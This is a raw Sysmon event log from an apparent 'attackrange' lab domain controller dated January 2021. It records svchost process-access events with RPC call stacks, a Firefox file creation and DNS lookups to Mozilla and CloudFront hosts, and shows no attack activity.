14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019307Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019306Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019305Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019304Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019303Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019302Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019301Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019300Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019299Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019298Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019297Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019296Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019295Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000019324Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:10:10.651{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\0lpne0dw.default-release\SiteSecurityServiceState.txt2021-01-18 14:04:57.523 22542200x800000000000000019325Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:10:26.666{59A5CD1D-945A-6005-3305-00000000A301}7052firefox.settings.services.mozilla.com0::ffff:143.204.215.95;::ffff:143.204.215.126;::ffff:143.204.215.37;::ffff:143.204.215.75;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000019330Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:10:26.903{59A5CD1D-945A-6005-3305-00000000A301}7052d2nxq2uap88usk.cloudfront.net02600:9000:20e8:1000:a:da5e:7900:93a1;2600:9000:20e8:4600:a:da5e:7900:93a1;2600:9000:20e8:5400:a:da5e:7900:93a1;2600:9000:20e8:6400:a:da5e:7900:93a1;2600:9000:20e8:9000:a:da5e:7900:93a1;2600:9000:20e8:a600:a:da5e:7900:93a1;2600:9000:20e8:bc00:a:da5e:7900:93a1;2600:9000:20e8:e800:a:da5e:7900:93a1;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000019329Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:10:26.901{59A5CD1D-945A-6005-3305-00000000A301}7052d2nxq2uap88usk.cloudfront.net099.84.90.119;99.84.90.128;99.84.90.17;99.84.90.69;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000019328Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:10:26.900{59A5CD1D-945A-6005-3305-00000000A301}7052content-signature-2.cdn.mozilla.net0type: 5 d2nxq2uap88usk.cloudfront.net;99.84.90.69;99.84.90.119;99.84.90.128;99.84.90.17;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000019327Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:10:26.900{59A5CD1D-945A-6005-3305-00000000A301}7052content-signature-2.cdn.mozilla.net0type: 5 d2nxq2uap88usk.cloudfront.net;::ffff:99.84.90.69;::ffff:99.84.90.119;::ffff:99.84.90.128;::ffff:99.84.90.17;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000019326Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:10:26.667{59A5CD1D-945A-6005-3305-00000000A301}7052firefox.settings.services.mozilla.com0143.204.215.126;143.204.215.37;143.204.215.75;143.204.215.95;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000019332Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:10:28.743{59A5CD1D-8E56-6005-2E00-00000000A301}246469.90.84.99.in-addr.arpa.0type: 12 server-99-84-90-69.muc50.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000019331Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:10:27.697{59A5CD1D-8E56-6005-2E00-00000000A301}246495.215.204.143.in-addr.arpa.0type: 12 server-143-204-215-95.fra53.r.cloudfront.net;C:\Windows\sysmon64.exe